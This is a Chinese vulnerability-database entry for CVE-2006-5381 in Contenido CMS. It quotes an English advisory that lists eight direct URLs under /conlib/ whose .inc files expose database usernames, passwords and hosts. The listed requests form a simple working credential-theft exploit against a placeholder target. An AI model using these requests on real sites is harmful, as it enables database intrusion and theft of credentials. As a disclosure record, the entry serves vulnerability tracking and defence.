Contenido CMS 敏感数据泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193132 漏洞类型 未知
发布时间 2006-10-18 更新时间 2006-10-18
CVE编号 CVE-2006-5381 CNNVD-ID CNNVD-200610-318
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/84787
https://cxsecurity.com/issue/WLB-2006100102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-318
|漏洞详情
ContenidoCMS在web根目录下存储敏感数据,且访问控制较弱,从而远程攻击者可以通过直接请求conlib/目录下的(1)db_msql.inc,(2)db_mssql.inc,(3)db_mysqli.inc,(4)db_oci8.inc,(5)db_odbc.inc,(6)db_oracle.inc,(7)db_pgsql.inc或(8)db_sybase.inc来获取数据库凭证和其他信息。
|漏洞EXP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
                                      CMS contenido Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
                          Affected Software .: CMS contenido
                          download..: http://www.contenido.org/opensourcecms/en/index-a-104.html                     
                          Risk ..............: high                              
                          Found by ..........: CvIr.System                                                  
                          Contact ...........: CvIr.System[at]gmail.com                                   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~

Affected File:                                                                
/conlib/*.inc

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
Explicasion:             
                                                         
http://[target]/conlib/db_msql.inc
http://[target]/conlib/db_mssql.inc
http://[target]/conlib/db_mysqli.inc
http://[target]/conlib/db_oci8.inc
http://[target]/conlib/db_odbc.inc
http://[target]/conlib/db_oracle.inc
http://[target]/conlib/db_pgsql.inc
http://[target]/conlib/db_sybase.inc

You can see data of the Web like User of db, password, Database, host and thus connect yourselves remotely to the DB
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
Special GreetingS:_ANtrAX_|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Hanowars|B
acan|xarnuz|Slappter|mnox|Txis|The Shredder|FaLeNcE|Darkness-Mx|Zickox| www.c-group.org
|受影响的产品
Contenido Contendio 4.6 Contenido Contendio 4.5.6 Beta Contenido Contendio 4.5.2 Alpha
|参考资料

来源:BUGTRAQ
名称:20061013CMScontenidoPathDisclosure
链接:http://www.securityfocus.com/archive/1/archive/1/448563/100/0/threaded
来源:SREASON
名称:1738
链接:http://securityreason.com/securityalert/1738